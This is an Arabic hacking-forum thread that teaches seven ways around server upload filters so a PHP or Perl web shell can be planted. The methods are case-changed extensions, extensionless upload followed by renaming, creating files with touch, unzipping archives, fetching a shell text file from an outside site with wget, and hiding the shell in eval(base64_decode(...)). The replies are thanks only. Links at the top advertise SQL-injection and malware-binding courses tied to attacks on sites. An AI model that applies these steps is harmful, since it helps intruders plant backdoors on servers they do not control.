1. المٌقدمة الأولي :دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    تٌعد ثغرات حقن قواعد البينات الثغرة رقم واحد فى العالم والمصنفة تحت بند الإخطر
    والفريق التابع له بإختراق أكبر المواقع الصهيونية قرائة الموضوع
  2. المٌقدمة الثانية : دورة إختبار ثغرات حقن قواعد البيانات SQLI الإحترافية لعام 2017 عام 2018
    في هذه المٌثقدمة الثانية والأخيرة سوف نتعرف على قواعد علم حقن قواعد البيانات
    حتى يتثنى لنا علم يٌساعدنا على القيام بعمليات الحقن بالطرق الصحيحه قرائة الموضوع
  3. دورة كشف دمج والتلغيم حصريا على أرض عراق تيم(2017)
    بعد ماقمت بعمل دورة الكشف دمج والتلغيم وستكملت الدوره وتحتوي على 12 درس
    كانت دروس حصريا على عراق تيم وشرح واضح جدا ومفهوم الى المبتدأ والى المبدع قرائة الموضوع

[ شرح ] طرق تخطي منع رفع الملفات في السيرفر

الموضوع في 'آمن المواقع والسيرفرات' بواسطة kes-kbz, بتاريخ ‏18 مايو 2013.

كاتب الموضوع : kes-kbz المشاهدات : 1,543 الردود : 10 ‏18 مايو 2013
حالة الموضوع:
مغلق
  1. غير متصل

    kes-kbz
    rankrank
    Developer

    عضو منذ:
    ‏13 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الوظيفة:
    SeCuRiTy & HaCKeD
    الإقامة:

    السلام عليكم ورحمة الله وبركاته

    ندخل بصلب الموضوع .. طبعا حماية منع رفع الملفات عقدة *:"

    وتعقد منها الكثير ربما .. وحبيت انزل لها الحل الجذري باذن الله :{13}:

    وسأتطرق لطرق عديدة ان شاء الله...

    في هذا الموضوع راح اتكلم عن طرق لتخطي هذي المشكلة

    طيب هذه الحماية باختصار فلترة للملفات المرفوعة ..

    يعني مثلا تجي ترفع سكربت يكون شل مثلا !!:{

    php او perl او غيره

    يجيك بعد عملية الرفع :

    Forbidden

    او

    Not Acceptable

    والحين راح نتخطى المشاكل هذي بعملية الرفع في السيرفر i:q^:

    طيب نجي للطريقة الاولى :

    1- ارفع اي ملف وليكن draadil.PHP

    غيرنا امتداد الملف الى PHP كابتل وهذي طريقة لتخطي فلترة

    امتدادات الملفات المرفوعة ...

    طيب نجي لطريقة ثانية :

    2- نرفع ملف الشل بدون امتداد مثال على ذلك :

    dr.aadil

    يعني ملف بدون صيغة غير معروف منزوع الامتداد

    وبعد عملية الرفع يتم تغيير اسم الملف الى : dr.aadil.php

    او

    dr.aadil.PHP

    ويتم تغيير اسم الملف بالامر التالي :
    كود PHP:
    mv dr.aadil dr.aadil.php 
    طيب الحين الطريقة الثالثة وهي انشاء ملف :

    3- يتم انشاء ملف من الشل او بالامر التالي :
    كود PHP:
    touch dr.aadil.php 
    ومن ثم يتم التعديل على الملف وحفظه ..

    الطريقة الرابعة وهي عن طريق رفع الملف مضغوط :

    4- ترفع ملف الشل او اي ملف بداخل ملف مضغوط zip

    ومن ثم تفك الضغط عنه بامر :
    كود PHP:
    unzip dr.aadil.zip 
    الطريقة الخامسة وهي عن طريق الشلات التي بها خاصية

    5- اختيار الملف لرفعه ومن ثم تغيير اسم الملف بعد الرفع ...

    وتنفع بتخطي مشكلة منع رفع الملفات ..

    الطريقة السادسة وهي عن طريق جلب الملف من خارج السيرفر

    6- تنسخ رابط ملف txt محتواه شل بيرل او غيره ومن ثم تستدعيه

    بالامر التالي مثال :
    كود PHP:
    wget http://site.com/dr.aadil.txt 
    وبعد جلبه يتم تغيير اسمه الى php او pl على حسب الملف

    الطريقة السابعة وهي عن طريق تشفير الملفات المرفوعة

    7- تشفر سورس الملف بالتشفيرات الشائعة

    مثلا تشفر ملف الشل php بهذه الطريقة :

    كود PHP:
    <?
    eval(
    base64_decode('هنا تضع ناتج التشفير'));
    ?>
    والتشفيرات الاخرى وهكذا ...

    وفيه طريقة لتخطي رفع الملفات باداة التمبر داتا لخداع رفع الملفات

    معروفة وتنفع في التخطي في بعض السيرفرات ..

    ولاكن نزلت لكم الطرق هذي وان شاء الله راح ترفع ملفك رغم انف الحماية

    ... كذا انتهينى ...

    تحياتي للجميع .. والقادم افضل باذن الله &:":
     


    جاري تحميل الصفحة...
  2. غير متصل

    روبورت1 <img src="http://im34.gulfup.com/s2o63.gif"><br>فر

    عضو منذ:
    ‏8 نوفمبر 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    عزيزي الكاتب ، شكراً لك على الإفادة في المنتدى بإضافة مادّة علمية جديدة إليه
    كتب الله لك أجر كل من استفاد منها.

    * تنبيه للأعضاء والزوّار ، نتمنّى عدم دخول أيّة روابط خارجيّة أو تحميل أي مرفق موجود بالموضوع
    حتى يتم تأكيد سلامة المحتوى برد من قبل أحد أعضاء فريق الفحص أو مشرف القسم.

    هذه العضوية آليّة ، غير مُدارة من قبل أي عُنصر بشري ، إنما مبرمجة لتقوم ببعض أعمال التنظيم والمتابعة في المنتدى.

     


  3. غير متصل

    AD4 Hacker
    rank
    Developer

    عضو منذ:
    ‏11 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: طرق تخطي منع رفع الملفات في السيرفر

    سملت يدآك حبيبي تستاهل لايك i:q^: ​
     


  4. غير متصل

    Mr.Angel
    rank
    Developer

    عضو منذ:
    ‏3 يونيو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: طرق تخطي منع رفع الملفات في السيرفر

    شكرا على المجهود رائع
    بالتوفيق ..:{1}: ​
     


  5. غير متصل

    asiko
    rank
    Developer

    عضو منذ:
    ‏16 يناير 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: طرق تخطي منع رفع الملفات في السيرفر

    جزاك الله الف خير اخى الكريم!!:{​
     


  6. غير متصل

    speeedh
    rank
    Developer

    عضو منذ:
    ‏21 مارس 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:

    رد: طرق تخطي منع رفع الملفات في السيرفر

    الف شكر ليك يا غالى​
     


  7. غير متصل

    ساكن الروح
    rank
    Developer

    عضو منذ:
    ‏16 سبتمبر 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    1
    نقاط الجائزة:

    رد: طرق تخطي منع رفع الملفات في السيرفر

    الله يعطيك العافيه مجهود تشكر عليه
    سلمت يدك اخي )5:"​
     


  8. غير متصل

    black.boy
    rank
    Developer

    عضو منذ:
    ‏29 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    0
    نقاط الجائزة:
    الإقامة:

    رد: طرق تخطي منع رفع الملفات في السيرفر

    بارك الله فيك اخوى

    يعطيك الف عافية ​
     


  9. غير متصل

    Dr.AnTi_HaCkEr
    DeveloPer Plus

    عضو منذ:
    ‏8 مايو 2012
    عدد المشاركات:
    الإعجابات المتلقاة:
    3
    نقاط الجائزة:

    رد: طرق تخطي منع رفع الملفات في السيرفر

    آلله يعطيكـ آلعافيه

    تحيآتي
     


  10. غير متصل

    al-swisre
    rank
    DeveloPer Plus

    عضو منذ:
    ‏17 مايو 2011
    عدد المشاركات:
    الإعجابات المتلقاة:
    2
    نقاط الجائزة:
    الوظيفة:
    كيف الحال ؟
    الإقامة:

    رد: طرق تخطي منع رفع الملفات في السيرفر

    كفوؤ واصل
    &:"
    جاري (+)
     


حالة الموضوع:
مغلق

مشاركة هذه الصفحة

جاري تحميل الصفحة...